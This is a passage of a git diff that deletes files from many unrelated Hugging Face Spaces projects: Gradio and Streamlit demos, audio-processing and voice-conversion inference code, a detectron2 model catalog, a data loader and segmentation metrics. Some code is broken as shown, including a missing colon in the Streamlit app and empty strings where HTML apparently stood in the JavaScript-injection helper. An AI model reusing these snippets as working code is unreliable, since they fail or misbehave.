self.config.getFloatConfig("train.intercept.scaling")[0] - classWeight = self.config.getStringConfig("train.class.weight")[0] - randomState = self.config.getIntConfig("train.random.state")[0] - solver = self.config.getStringConfig("train.solver")[0] - maxIter = self.config.getIntConfig("train.max.iter")[0] - multiClass = self.config.getStringConfig("train.multi.class")[0] - verbos = self.config.getIntConfig("train.verbose")[0] - warmStart = self.config.getBooleanConfig("train.warm.start")[0] - nJobs = self.config.getIntConfig("train.num.jobs")[0] - l1Ratio = self.config.getFloatConfig("train.l1.ratio")[0] - - self.classifier = LogisticRegression(penalty=penalty, dual=dual, tol=tol, C=c, fit_intercept=fitIntercept,\ - intercept_scaling=interceptScaling, class_weight=classWeight, random_state=randomState, solver=solver,\ - max_iter=maxIter, multi_class=multiClass, verbose=verbos, warm_start=warmStart, n_jobs=nJobs, l1_ratio=l1Ratio) - - return self.classifier - - - diff --git a/spaces/UglyLemon/LEMONTR/app.py b/spaces/UglyLemon/LEMONTR/app.py deleted file mode 100644 index 5840c4a717bf730cfd0948402c81feb0bfed8c2d..0000000000000000000000000000000000000000 --- a/spaces/UglyLemon/LEMONTR/app.py +++ /dev/null @@ -1,9 +0,0 @@ -import streamlit as st -from transformers import pipeline - -pipe = pipeline('sentiment-analysis') -text = st.text_area('enter some text!') - -if text - out = pipe(text) - st.json(out) \ No newline at end of file diff --git a/spaces/VIPLab/Track-Anything/app_test.py b/spaces/VIPLab/Track-Anything/app_test.py deleted file mode 100644 index cd10fe77cec552dffba84c6516ec33a6622b6c38..0000000000000000000000000000000000000000 --- a/spaces/VIPLab/Track-Anything/app_test.py +++ /dev/null @@ -1,46 +0,0 @@ -# import gradio as gr - -# def update_iframe(slider_value): -# return f''' -# -# -# ''' - -# iface = gr.Interface( -# fn=update_iframe, -# inputs=gr.inputs.Slider(minimum=0, maximum=100, step=1, default=50), -# outputs=gr.outputs.HTML(), -# allow_flagging=False, -# ) - -# iface.launch(server_name='0.0.0.0', server_port=12212) - -import gradio as gr - - -def change_mask(drop): - return gr.update(choices=["hello", "kitty"]) - -with gr.Blocks() as iface: - drop = gr.Dropdown( - choices=["cat", "dog", "bird"], label="Animal", info="Will add more animals later!" - ) - radio = gr.Radio(["park", "zoo", "road"], label="Location", info="Where did they go?") - multi_drop = gr.Dropdown( - ["ran", "swam", "ate", "slept"], value=["swam", "slept"], multiselect=True, label="Activity", info="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed auctor, nisl eget ultricies aliquam, nunc nisl aliquet nunc, eget aliquam nisl nunc vel nisl." 
- ) - - multi_drop.change( - fn=change_mask, - inputs = multi_drop, - outputs=multi_drop - ) - -iface.launch(server_name='0.0.0.0', server_port=1223) \ No newline at end of file diff --git a/spaces/WatchOutForMike/Character/app.py b/spaces/WatchOutForMike/Character/app.py deleted file mode 100644 index c04b6d45f84686618444749797188ca31fcb9882..0000000000000000000000000000000000000000 --- a/spaces/WatchOutForMike/Character/app.py +++ /dev/null @@ -1,3 +0,0 @@ -import gradio as gr - -gr.Interface.load("models/prompthero/openjourney-v4").launch() \ No newline at end of file diff --git a/spaces/Xyan-shuo2/Shoshoo/README.md b/spaces/Xyan-shuo2/Shoshoo/README.md deleted file mode 100644 index f72b01c4c37e1c4ac0585d7ea6e2235f5fde5839..0000000000000000000000000000000000000000 --- a/spaces/Xyan-shuo2/Shoshoo/README.md +++ /dev/null @@ -1,10 +0,0 @@ ---- -title: Shoshoo -emoji: 🌍 -colorFrom: green -colorTo: red -sdk: docker -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/XzJosh/Taffy-Bert-VITS2/mel_processing.py b/spaces/XzJosh/Taffy-Bert-VITS2/mel_processing.py deleted file mode 100644 index 50435ecf88ef4fb6c1d47f3e6edd04c3ea7d3e80..0000000000000000000000000000000000000000 --- a/spaces/XzJosh/Taffy-Bert-VITS2/mel_processing.py +++ /dev/null @@ -1,112 +0,0 @@ -import math -import os -import random -import torch -from torch import nn -import torch.nn.functional as F -import torch.utils.data -import numpy as np -import librosa -import librosa.util as librosa_util -from librosa.util import normalize, pad_center, tiny -from scipy.signal import get_window -from scipy.io.wavfile import read -from librosa.filters import mel as librosa_mel_fn - -MAX_WAV_VALUE = 32768.0 - - -def dynamic_range_compression_torch(x, C=1, clip_val=1e-5): - """ - PARAMS - ------ - C: compression factor - """ - return torch.log(torch.clamp(x, min=clip_val) * C) - - -def dynamic_range_decompression_torch(x, C=1): - """ - PARAMS - ------ - C: compression factor used to compress - """ - return torch.exp(x) / C - - -def spectral_normalize_torch(magnitudes): - output = dynamic_range_compression_torch(magnitudes) - return output - - -def spectral_de_normalize_torch(magnitudes): - output = dynamic_range_decompression_torch(magnitudes) - return output - - -mel_basis = {} -hann_window = {} - - -def spectrogram_torch(y, n_fft, sampling_rate, hop_size, win_size, center=False): - if torch.min(y) < -1.: - print('min value is ', torch.min(y)) - if torch.max(y) > 1.: - print('max value is ', torch.max(y)) - - global hann_window - dtype_device = str(y.dtype) + '_' + str(y.device) - wnsize_dtype_device = str(win_size) + '_' + dtype_device - if wnsize_dtype_device not in hann_window: - hann_window[wnsize_dtype_device] = torch.hann_window(win_size).to(dtype=y.dtype, device=y.device) - - y = torch.nn.functional.pad(y.unsqueeze(1), (int((n_fft-hop_size)/2), int((n_fft-hop_size)/2)), mode='reflect') - y = y.squeeze(1) - - spec = torch.stft(y, n_fft, hop_length=hop_size, win_length=win_size, window=hann_window[wnsize_dtype_device], - center=center, pad_mode='reflect', normalized=False, onesided=True, return_complex=False) - - spec = torch.sqrt(spec.pow(2).sum(-1) + 1e-6) - return spec - - -def spec_to_mel_torch(spec, n_fft, num_mels, sampling_rate, fmin, fmax): - global mel_basis - dtype_device = str(spec.dtype) + '_' + str(spec.device) - fmax_dtype_device = str(fmax) + '_' + dtype_device - if fmax_dtype_device not in mel_basis: - mel = 
librosa_mel_fn(sampling_rate, n_fft, num_mels, fmin, fmax) - mel_basis[fmax_dtype_device] = torch.from_numpy(mel).to(dtype=spec.dtype, device=spec.device) - spec = torch.matmul(mel_basis[fmax_dtype_device], spec) - spec = spectral_normalize_torch(spec) - return spec - - -def mel_spectrogram_torch(y, n_fft, num_mels, sampling_rate, hop_size, win_size, fmin, fmax, center=False): - if torch.min(y) < -1.: - print('min value is ', torch.min(y)) - if torch.max(y) > 1.: - print('max value is ', torch.max(y)) - - global mel_basis, hann_window - dtype_device = str(y.dtype) + '_' + str(y.device) - fmax_dtype_device = str(fmax) + '_' + dtype_device - wnsize_dtype_device = str(win_size) + '_' + dtype_device - if fmax_dtype_device not in mel_basis: - mel = librosa_mel_fn(sampling_rate, n_fft, num_mels, fmin, fmax) - mel_basis[fmax_dtype_device] = torch.from_numpy(mel).to(dtype=y.dtype, device=y.device) - if wnsize_dtype_device not in hann_window: - hann_window[wnsize_dtype_device] = torch.hann_window(win_size).to(dtype=y.dtype, device=y.device) - - y = torch.nn.functional.pad(y.unsqueeze(1), (int((n_fft-hop_size)/2), int((n_fft-hop_size)/2)), mode='reflect') - y = y.squeeze(1) - - spec = torch.stft(y, n_fft, hop_length=hop_size, win_length=win_size, window=hann_window[wnsize_dtype_device], - center=center, pad_mode='reflect', normalized=False, onesided=True, return_complex=False) - - spec = torch.sqrt(spec.pow(2).sum(-1) + 1e-6) - - spec = torch.matmul(mel_basis[fmax_dtype_device], spec) - spec = spectral_normalize_torch(spec) - - return spec diff --git a/spaces/YazawaSunrise/so-vits-svc-LoveLive/inference/infer_tool_grad.py b/spaces/YazawaSunrise/so-vits-svc-LoveLive/inference/infer_tool_grad.py deleted file mode 100644 index 39359a82e5cc288c7c3f41e58c7c0c954581b14f..0000000000000000000000000000000000000000 --- a/spaces/YazawaSunrise/so-vits-svc-LoveLive/inference/infer_tool_grad.py +++ /dev/null @@ -1,160 +0,0 @@ -import hashlib -import json -import logging -import os -import time -from pathlib import Path -import io -import librosa -import maad -import numpy as np -from inference import slicer -import parselmouth -import soundfile -import torch -import torchaudio - -from hubert import hubert_model -import utils -from models import SynthesizerTrn -logging.getLogger('numba').setLevel(logging.WARNING) -logging.getLogger('matplotlib').setLevel(logging.WARNING) - -def resize2d_f0(x, target_len): - source = np.array(x) - source[source < 0.001] = np.nan - target = np.interp(np.arange(0, len(source) * target_len, len(source)) / target_len, np.arange(0, len(source)), - source) - res = np.nan_to_num(target) - return res - -def get_f0(x, p_len,f0_up_key=0): - - time_step = 160 / 16000 * 1000 - f0_min = 50 - f0_max = 1100 - f0_mel_min = 1127 * np.log(1 + f0_min / 700) - f0_mel_max = 1127 * np.log(1 + f0_max / 700) - - f0 = parselmouth.Sound(x, 16000).to_pitch_ac( - time_step=time_step / 1000, voicing_threshold=0.6, - pitch_floor=f0_min, pitch_ceiling=f0_max).selected_array['frequency'] - - pad_size=(p_len - len(f0) + 1) // 2 - if(pad_size>0 or p_len - len(f0) - pad_size>0): - f0 = np.pad(f0,[[pad_size,p_len - len(f0) - pad_size]], mode='constant') - - f0 *= pow(2, f0_up_key / 12) - f0_mel = 1127 * np.log(1 + f0 / 700) - f0_mel[f0_mel > 0] = (f0_mel[f0_mel > 0] - f0_mel_min) * 254 / (f0_mel_max - f0_mel_min) + 1 - f0_mel[f0_mel <= 1] = 1 - f0_mel[f0_mel > 255] = 255 - f0_coarse = np.rint(f0_mel).astype(np.int) - return f0_coarse, f0 - -def clean_pitch(input_pitch): - num_nan = np.sum(input_pitch == 1) - if 
num_nan / len(input_pitch) > 0.9: - input_pitch[input_pitch != 1] = 1 - return input_pitch - - -def plt_pitch(input_pitch): - input_pitch = input_pitch.astype(float) - input_pitch[input_pitch == 1] = np.nan - return input_pitch - - -def f0_to_pitch(ff): - f0_pitch = 69 + 12 * np.log2(ff / 440) - return f0_pitch - - -def fill_a_to_b(a, b): - if len(a) < len(b): - for _ in range(0, len(b) - len(a)): - a.append(a[0]) - - -def mkdir(paths: list): - for path in paths: - if not os.path.exists(path): - os.mkdir(path) - - -class VitsSvc(object): - def __init__(self): - self.device = torch.device("cuda" if torch.cuda.is_available() else "cpu") - self.SVCVITS = None - self.hps = None - self.speakers = None - self.hubert_soft = hubert_model.hubert_soft("hubert/model.pt") - - def set_device(self, device): - self.device = torch.device(device) - self.hubert_soft.to(self.device) - if self.SVCVITS != None: - self.SVCVITS.to(self.device) - - def loadCheckpoint(self, path): - self.hps = utils.get_hparams_from_file(f"checkpoints/{path}/config.json") - self.SVCVITS = SynthesizerTrn( - self.hps.data.filter_length // 2 + 1, - self.hps.train.segment_size // self.hps.data.hop_length, - **self.hps.model) - _ = utils.load_checkpoint(f"checkpoints/{path}/model.pth", self.SVCVITS, None) - _ = self.SVCVITS.eval().to(self.device) - self.speakers = self.hps.spk - - def get_units(self, source, sr): - source = source.unsqueeze(0).to(self.device) - with torch.inference_mode(): - units = self.hubert_soft.units(source) - return units - - - def get_unit_pitch(self, in_path, tran): - source, sr = torchaudio.load(in_path) - source = torchaudio.functional.resample(source, sr, 16000) - if len(source.shape) == 2 and source.shape[1] >= 2: - source = torch.mean(source, dim=0).unsqueeze(0) - soft = self.get_units(source, sr).squeeze(0).cpu().numpy() - f0_coarse, f0 = get_f0(source.cpu().numpy()[0], soft.shape[0]*2, tran) - return soft, f0 - - def infer(self, speaker_id, tran, raw_path): - speaker_id = self.speakers[speaker_id] - sid = torch.LongTensor([int(speaker_id)]).to(self.device).unsqueeze(0) - soft, pitch = self.get_unit_pitch(raw_path, tran) - f0 = torch.FloatTensor(clean_pitch(pitch)).unsqueeze(0).to(self.device) - stn_tst = torch.FloatTensor(soft) - with torch.no_grad(): - x_tst = stn_tst.unsqueeze(0).to(self.device) - x_tst = torch.repeat_interleave(x_tst, repeats=2, dim=1).transpose(1, 2) - audio = self.SVCVITS.infer(x_tst, f0=f0, g=sid)[0,0].data.float() - return audio, audio.shape[-1] - - def inference(self,srcaudio,chara,tran,slice_db): - sampling_rate, audio = srcaudio - audio = (audio / np.iinfo(audio.dtype).max).astype(np.float32) - if len(audio.shape) > 1: - audio = librosa.to_mono(audio.transpose(1, 0)) - if sampling_rate != 16000: - audio = librosa.resample(audio, orig_sr=sampling_rate, target_sr=16000) - soundfile.write("tmpwav.wav", audio, 16000, format="wav") - chunks = slicer.cut("tmpwav.wav", db_thresh=slice_db) - audio_data, audio_sr = slicer.chunks2audio("tmpwav.wav", chunks) - audio = [] - for (slice_tag, data) in audio_data: - length = int(np.ceil(len(data) / audio_sr * self.hps.data.sampling_rate)) - raw_path = io.BytesIO() - soundfile.write(raw_path, data, audio_sr, format="wav") - raw_path.seek(0) - if slice_tag: - _audio = np.zeros(length) - else: - out_audio, out_sr = self.infer(chara, tran, raw_path) - _audio = out_audio.cpu().numpy() - audio.extend(list(_audio)) - audio = (np.array(audio) * 32768.0).astype('int16') - return (self.hps.data.sampling_rate,audio) diff --git 
a/spaces/Yiqin/ChatVID/model/vision/grit_src/third_party/CenterNet2/detectron2/checkpoint/catalog.py b/spaces/Yiqin/ChatVID/model/vision/grit_src/third_party/CenterNet2/detectron2/checkpoint/catalog.py deleted file mode 100644 index 9a85736754a0de4550df96c22f38fc515bd02d71..0000000000000000000000000000000000000000 --- a/spaces/Yiqin/ChatVID/model/vision/grit_src/third_party/CenterNet2/detectron2/checkpoint/catalog.py +++ /dev/null @@ -1,115 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -import logging - -from detectron2.utils.file_io import PathHandler, PathManager - - -class ModelCatalog(object): - """ - Store mappings from names to third-party models. - """ - - S3_C2_DETECTRON_PREFIX = "https://dl.fbaipublicfiles.com/detectron" - - # MSRA models have STRIDE_IN_1X1=True. False otherwise. - # NOTE: all BN models here have fused BN into an affine layer. - # As a result, you should only load them to a model with "FrozenBN". - # Loading them to a model with regular BN or SyncBN is wrong. - # Even when loaded to FrozenBN, it is still different from affine by an epsilon, - # which should be negligible for training. - # NOTE: all models here uses PIXEL_STD=[1,1,1] - # NOTE: Most of the BN models here are no longer used. We use the - # re-converted pre-trained models under detectron2 model zoo instead. - C2_IMAGENET_MODELS = { - "MSRA/R-50": "ImageNetPretrained/MSRA/R-50.pkl", - "MSRA/R-101": "ImageNetPretrained/MSRA/R-101.pkl", - "FAIR/R-50-GN": "ImageNetPretrained/47261647/R-50-GN.pkl", - "FAIR/R-101-GN": "ImageNetPretrained/47592356/R-101-GN.pkl", - "FAIR/X-101-32x8d": "ImageNetPretrained/20171220/X-101-32x8d.pkl", - "FAIR/X-101-64x4d": "ImageNetPretrained/FBResNeXt/X-101-64x4d.pkl", - "FAIR/X-152-32x8d-IN5k": "ImageNetPretrained/25093814/X-152-32x8d-IN5k.pkl", - } - - C2_DETECTRON_PATH_FORMAT = ( - "{prefix}/{url}/output/train/{dataset}/{type}/model_final.pkl" # noqa B950 - ) - - C2_DATASET_COCO = "coco_2014_train%3Acoco_2014_valminusminival" - C2_DATASET_COCO_KEYPOINTS = "keypoints_coco_2014_train%3Akeypoints_coco_2014_valminusminival" - - # format: {model_name} -> part of the url - C2_DETECTRON_MODELS = { - "35857197/e2e_faster_rcnn_R-50-C4_1x": "35857197/12_2017_baselines/e2e_faster_rcnn_R-50-C4_1x.yaml.01_33_49.iAX0mXvW", # noqa B950 - "35857345/e2e_faster_rcnn_R-50-FPN_1x": "35857345/12_2017_baselines/e2e_faster_rcnn_R-50-FPN_1x.yaml.01_36_30.cUF7QR7I", # noqa B950 - "35857890/e2e_faster_rcnn_R-101-FPN_1x": "35857890/12_2017_baselines/e2e_faster_rcnn_R-101-FPN_1x.yaml.01_38_50.sNxI7sX7", # noqa B950 - "36761737/e2e_faster_rcnn_X-101-32x8d-FPN_1x": "36761737/12_2017_baselines/e2e_faster_rcnn_X-101-32x8d-FPN_1x.yaml.06_31_39.5MIHi1fZ", # noqa B950 - "35858791/e2e_mask_rcnn_R-50-C4_1x": "35858791/12_2017_baselines/e2e_mask_rcnn_R-50-C4_1x.yaml.01_45_57.ZgkA7hPB", # noqa B950 - "35858933/e2e_mask_rcnn_R-50-FPN_1x": "35858933/12_2017_baselines/e2e_mask_rcnn_R-50-FPN_1x.yaml.01_48_14.DzEQe4wC", # noqa B950 - "35861795/e2e_mask_rcnn_R-101-FPN_1x": "35861795/12_2017_baselines/e2e_mask_rcnn_R-101-FPN_1x.yaml.02_31_37.KqyEK4tT", # noqa B950 - "36761843/e2e_mask_rcnn_X-101-32x8d-FPN_1x": "36761843/12_2017_baselines/e2e_mask_rcnn_X-101-32x8d-FPN_1x.yaml.06_35_59.RZotkLKI", # noqa B950 - "48616381/e2e_mask_rcnn_R-50-FPN_2x_gn": "GN/48616381/04_2018_gn_baselines/e2e_mask_rcnn_R-50-FPN_2x_gn_0416.13_23_38.bTlTI97Q", # noqa B950 - "37697547/e2e_keypoint_rcnn_R-50-FPN_1x": "37697547/12_2017_baselines/e2e_keypoint_rcnn_R-50-FPN_1x.yaml.08_42_54.kdzV35ao", # noqa B950 - 
"35998355/rpn_R-50-C4_1x": "35998355/12_2017_baselines/rpn_R-50-C4_1x.yaml.08_00_43.njH5oD9L", # noqa B950 - "35998814/rpn_R-50-FPN_1x": "35998814/12_2017_baselines/rpn_R-50-FPN_1x.yaml.08_06_03.Axg0r179", # noqa B950 - "36225147/fast_R-50-FPN_1x": "36225147/12_2017_baselines/fast_rcnn_R-50-FPN_1x.yaml.08_39_09.L3obSdQ2", # noqa B950 - } - - @staticmethod - def get(name): - if name.startswith("Caffe2Detectron/COCO"): - return ModelCatalog._get_c2_detectron_baseline(name) - if name.startswith("ImageNetPretrained/"): - return ModelCatalog._get_c2_imagenet_pretrained(name) - raise RuntimeError("model not present in the catalog: {}".format(name)) - - @staticmethod - def _get_c2_imagenet_pretrained(name): - prefix = ModelCatalog.S3_C2_DETECTRON_PREFIX - name = name[len("ImageNetPretrained/") :] - name = ModelCatalog.C2_IMAGENET_MODELS[name] - url = "/".join([prefix, name]) - return url - - @staticmethod - def _get_c2_detectron_baseline(name): - name = name[len("Caffe2Detectron/COCO/") :] - url = ModelCatalog.C2_DETECTRON_MODELS[name] - if "keypoint_rcnn" in name: - dataset = ModelCatalog.C2_DATASET_COCO_KEYPOINTS - else: - dataset = ModelCatalog.C2_DATASET_COCO - - if "35998355/rpn_R-50-C4_1x" in name: - # this one model is somehow different from others .. - type = "rpn" - else: - type = "generalized_rcnn" - - # Detectron C2 models are stored in the structure defined in `C2_DETECTRON_PATH_FORMAT`. - url = ModelCatalog.C2_DETECTRON_PATH_FORMAT.format( - prefix=ModelCatalog.S3_C2_DETECTRON_PREFIX, url=url, type=type, dataset=dataset - ) - return url - - -class ModelCatalogHandler(PathHandler): - """ - Resolve URL like catalog://. - """ - - PREFIX = "catalog://" - - def _get_supported_prefixes(self): - return [self.PREFIX] - - def _get_local_path(self, path, **kwargs): - logger = logging.getLogger(__name__) - catalog_path = ModelCatalog.get(path[len(self.PREFIX) :]) - logger.info("Catalog entry {} points to {}".format(path, catalog_path)) - return PathManager.get_local_path(catalog_path, **kwargs) - - def _open(self, path, mode="r", **kwargs): - return PathManager.open(self._get_local_path(path), mode, **kwargs) - - -PathManager.register_handler(ModelCatalogHandler()) diff --git a/spaces/YuDou/ChuanhuChatGPT/chatgpt - macOS.command b/spaces/YuDou/ChuanhuChatGPT/chatgpt - macOS.command deleted file mode 100644 index fa015edca9e6916f24394813ce8ba77d2072e296..0000000000000000000000000000000000000000 --- a/spaces/YuDou/ChuanhuChatGPT/chatgpt - macOS.command +++ /dev/null @@ -1,7 +0,0 @@ -#!/bin/bash -echo Opening ChuanhuChatGPT... -cd "$(dirname "${BASH_SOURCE[0]}")" -nohup python3 ChuanhuChatbot.py >/dev/null 2>&1 & -sleep 5 -open http://127.0.0.1:7860 -echo Finished opening ChuanhuChatGPT (http://127.0.0.1:7860/). If you kill ChuanhuChatbot, Use "pkill -f 'ChuanhuChatbot'" command in terminal. 
\ No newline at end of file diff --git a/spaces/Yuliang/ECON/lib/pymafx/utils/data_loader.py b/spaces/Yuliang/ECON/lib/pymafx/utils/data_loader.py deleted file mode 100644 index 3d109f82b3473242a9fb9442037c47471fd0f7d2..0000000000000000000000000000000000000000 --- a/spaces/Yuliang/ECON/lib/pymafx/utils/data_loader.py +++ /dev/null @@ -1,78 +0,0 @@ -from __future__ import division - -import torch -from torch.utils.data import DataLoader -from torch.utils.data.sampler import Sampler - - -class RandomSampler(Sampler): - def __init__(self, data_source, checkpoint): - self.data_source = data_source - if checkpoint is not None and checkpoint['dataset_perm'] is not None: - self.dataset_perm = checkpoint['dataset_perm'] - self.perm = self.dataset_perm[checkpoint['batch_size'] * checkpoint['batch_idx']:] - else: - self.dataset_perm = torch.randperm(len(self.data_source)).tolist() - self.perm = torch.randperm(len(self.data_source)).tolist() - - def __iter__(self): - return iter(self.perm) - - def __len__(self): - return len(self.perm) - - -class SequentialSampler(Sampler): - def __init__(self, data_source, checkpoint): - self.data_source = data_source - if checkpoint is not None and checkpoint['dataset_perm'] is not None: - self.dataset_perm = checkpoint['dataset_perm'] - self.perm = self.dataset_perm[checkpoint['batch_size'] * checkpoint['batch_idx']:] - else: - self.dataset_perm = list(range(len(self.data_source))) - self.perm = self.dataset_perm - - def __iter__(self): - return iter(self.perm) - - def __len__(self): - return len(self.perm) - - -class CheckpointDataLoader(DataLoader): - """ - Extends torch.utils.data.DataLoader to handle resuming training from an arbitrary point within an epoch. - """ - def __init__( - self, - dataset, - checkpoint=None, - batch_size=1, - shuffle=False, - num_workers=0, - pin_memory=False, - drop_last=True, - timeout=0, - worker_init_fn=None - ): - - if shuffle: - sampler = RandomSampler(dataset, checkpoint) - else: - sampler = SequentialSampler(dataset, checkpoint) - if checkpoint is not None: - self.checkpoint_batch_idx = checkpoint['batch_idx'] - else: - self.checkpoint_batch_idx = 0 - - super(CheckpointDataLoader, self).__init__( - dataset, - sampler=sampler, - shuffle=False, - batch_size=batch_size, - num_workers=num_workers, - drop_last=drop_last, - pin_memory=pin_memory, - timeout=timeout, - worker_init_fn=None - ) diff --git a/spaces/ZJunTvT/ZJunChat/modules/overwrites.py b/spaces/ZJunTvT/ZJunChat/modules/overwrites.py deleted file mode 100644 index 035a4a52722d66ee28af1c05231ad1cea3339ef5..0000000000000000000000000000000000000000 --- a/spaces/ZJunTvT/ZJunChat/modules/overwrites.py +++ /dev/null @@ -1,94 +0,0 @@ -from __future__ import annotations -import logging - -from llama_index import Prompt -from typing import List, Tuple -import mdtex2html -from gradio_client import utils as client_utils - -from modules.presets import * -from modules.llama_func import * - - -def compact_text_chunks(self, prompt: Prompt, text_chunks: List[str]) -> List[str]: - logging.debug("Compacting text chunks...🚀🚀🚀") - combined_str = [c.strip() for c in text_chunks if c.strip()] - combined_str = [f"[{index+1}] {c}" for index, c in enumerate(combined_str)] - combined_str = "\n\n".join(combined_str) - # resplit based on self.max_chunk_overlap - text_splitter = self.get_text_splitter_given_prompt(prompt, 1, padding=1) - return text_splitter.split_text(combined_str) - - -def postprocess( - self, - y: List[List[str | Tuple[str] | Tuple[str, str] | None] | Tuple], - ) -> List[List[str 
| Dict | None]]: - """ - Parameters: - y: List of lists representing the message and response pairs. Each message and response should be a string, which may be in Markdown format. It can also be a tuple whose first element is a string filepath or URL to an image/video/audio, and second (optional) element is the alt text, in which case the media file is displayed. It can also be None, in which case that message is not displayed. - Returns: - List of lists representing the message and response. Each message and response will be a string of HTML, or a dictionary with media information. Or None if the message is not to be displayed. - """ - if y is None: - return [] - processed_messages = [] - for message_pair in y: - assert isinstance( - message_pair, (tuple, list) - ), f"Expected a list of lists or list of tuples. Received: {message_pair}" - assert ( - len(message_pair) == 2 - ), f"Expected a list of lists of length 2 or list of tuples of length 2. Received: {message_pair}" - - processed_messages.append( - [ - self._postprocess_chat_messages(message_pair[0], "user"), - self._postprocess_chat_messages(message_pair[1], "bot"), - ] - ) - return processed_messages - -def postprocess_chat_messages( - self, chat_message: str | Tuple | List | None, message_type: str - ) -> str | Dict | None: - if chat_message is None: - return None - elif isinstance(chat_message, (tuple, list)): - filepath = chat_message[0] - mime_type = client_utils.get_mimetype(filepath) - filepath = self.make_temp_copy_if_needed(filepath) - return { - "name": filepath, - "mime_type": mime_type, - "alt_text": chat_message[1] if len(chat_message) > 1 else None, - "data": None, # These last two fields are filled in by the frontend - "is_file": True, - } - elif isinstance(chat_message, str): - if message_type == "bot": - if not detect_converted_mark(chat_message): - chat_message = convert_mdtext(chat_message) - elif message_type == "user": - if not detect_converted_mark(chat_message): - chat_message = convert_asis(chat_message) - return chat_message - else: - raise ValueError(f"Invalid message for Chatbot component: {chat_message}") - -with open("./assets/custom.js", "r", encoding="utf-8") as f, open("./assets/Kelpy-Codos.js", "r", encoding="utf-8") as f2: - customJS = f.read() - kelpyCodos = f2.read() - -def reload_javascript(): - print("Reloading javascript...") - js = f'' - def template_response(*args, **kwargs): - res = GradioTemplateResponseOriginal(*args, **kwargs) - res.body = res.body.replace(b'', f'{js}'.encode("utf8")) - res.init_headers() - return res - - gr.routes.templates.TemplateResponse = template_response - -GradioTemplateResponseOriginal = gr.routes.templates.TemplateResponse \ No newline at end of file diff --git a/spaces/abhishek/sketch-to-image/annotator/uniformer/mmseg/core/evaluation/metrics.py b/spaces/abhishek/sketch-to-image/annotator/uniformer/mmseg/core/evaluation/metrics.py deleted file mode 100644 index 16c7dd47cadd53cf1caaa194e28a343f2aacc599..0000000000000000000000000000000000000000 --- a/spaces/abhishek/sketch-to-image/annotator/uniformer/mmseg/core/evaluation/metrics.py +++ /dev/null @@ -1,326 +0,0 @@ -from collections import OrderedDict - -import annotator.uniformer.mmcv as mmcv -import numpy as np -import torch - - -def f_score(precision, recall, beta=1): - """calcuate the f-score value. - - Args: - precision (float | torch.Tensor): The precision value. - recall (float | torch.Tensor): The recall value. - beta (int): Determines the weight of recall in the combined score. - Default: False. 
- - Returns: - [torch.tensor]: The f-score value. - """ - score = (1 + beta**2) * (precision * recall) / ( - (beta**2 * precision) + recall) - return score - - -def intersect_and_union(pred_label, - label, - num_classes, - ignore_index, - label_map=dict(), - reduce_zero_label=False): - """Calculate intersection and Union. - - Args: - pred_label (ndarray | str): Prediction segmentation map - or predict result filename. - label (ndarray | str): Ground truth segmentation map - or label filename. - num_classes (int): Number of categories. - ignore_index (int): Index that will be ignored in evaluation. - label_map (dict): Mapping old labels to new labels. The parameter will - work only when label is str. Default: dict(). - reduce_zero_label (bool): Wether ignore zero label. The parameter will - work only when label is str. Default: False. - - Returns: - torch.Tensor: The intersection of prediction and ground truth - histogram on all classes. - torch.Tensor: The union of prediction and ground truth histogram on - all classes. - torch.Tensor: The prediction histogram on all classes. - torch.Tensor: The ground truth histogram on all classes. - """ - - if isinstance(pred_label, str): - pred_label = torch.from_numpy(np.load(pred_label)) - else: - pred_label = torch.from_numpy((pred_label)) - - if isinstance(label, str): - label = torch.from_numpy( - mmcv.imread(label, flag='unchanged', backend='pillow')) - else: - label = torch.from_numpy(label) - - if label_map is not None: - for old_id, new_id in label_map.items(): - label[label == old_id] = new_id - if reduce_zero_label: - label[label == 0] = 255 - label = label - 1 - label[label == 254] = 255 - - mask = (label != ignore_index) - pred_label = pred_label[mask] - label = label[mask] - - intersect = pred_label[pred_label == label] - area_intersect = torch.histc( - intersect.float(), bins=(num_classes), min=0, max=num_classes - 1) - area_pred_label = torch.histc( - pred_label.float(), bins=(num_classes), min=0, max=num_classes - 1) - area_label = torch.histc( - label.float(), bins=(num_classes), min=0, max=num_classes - 1) - area_union = area_pred_label + area_label - area_intersect - return area_intersect, area_union, area_pred_label, area_label - - -def total_intersect_and_union(results, - gt_seg_maps, - num_classes, - ignore_index, - label_map=dict(), - reduce_zero_label=False): - """Calculate Total Intersection and Union. - - Args: - results (list[ndarray] | list[str]): List of prediction segmentation - maps or list of prediction result filenames. - gt_seg_maps (list[ndarray] | list[str]): list of ground truth - segmentation maps or list of label filenames. - num_classes (int): Number of categories. - ignore_index (int): Index that will be ignored in evaluation. - label_map (dict): Mapping old labels to new labels. Default: dict(). - reduce_zero_label (bool): Wether ignore zero label. Default: False. - - Returns: - ndarray: The intersection of prediction and ground truth histogram - on all classes. - ndarray: The union of prediction and ground truth histogram on all - classes. - ndarray: The prediction histogram on all classes. - ndarray: The ground truth histogram on all classes. 
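 -
 - Example (illustrative): for a single class where the prediction covers
 - 50 pixels, the ground truth covers 40 and the two agree on 30 pixels,
 - the returned histograms hold intersect=30, union=50+40-30=60,
 - pred_label=50 and label=40 at that class index.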
- """ - num_imgs = len(results) - assert len(gt_seg_maps) == num_imgs - total_area_intersect = torch.zeros((num_classes, ), dtype=torch.float64) - total_area_union = torch.zeros((num_classes, ), dtype=torch.float64) - total_area_pred_label = torch.zeros((num_classes, ), dtype=torch.float64) - total_area_label = torch.zeros((num_classes, ), dtype=torch.float64) - for i in range(num_imgs): - area_intersect, area_union, area_pred_label, area_label = \ - intersect_and_union( - results[i], gt_seg_maps[i], num_classes, ignore_index, - label_map, reduce_zero_label) - total_area_intersect += area_intersect - total_area_union += area_union - total_area_pred_label += area_pred_label - total_area_label += area_label - return total_area_intersect, total_area_union, total_area_pred_label, \ - total_area_label - - -def mean_iou(results, - gt_seg_maps, - num_classes, - ignore_index, - nan_to_num=None, - label_map=dict(), - reduce_zero_label=False): - """Calculate Mean Intersection and Union (mIoU) - - Args: - results (list[ndarray] | list[str]): List of prediction segmentation - maps or list of prediction result filenames. - gt_seg_maps (list[ndarray] | list[str]): list of ground truth - segmentation maps or list of label filenames. - num_classes (int): Number of categories. - ignore_index (int): Index that will be ignored in evaluation. - nan_to_num (int, optional): If specified, NaN values will be replaced - by the numbers defined by the user. Default: None. - label_map (dict): Mapping old labels to new labels. Default: dict(). - reduce_zero_label (bool): Wether ignore zero label. Default: False. - - Returns: - dict[str, float | ndarray]: - 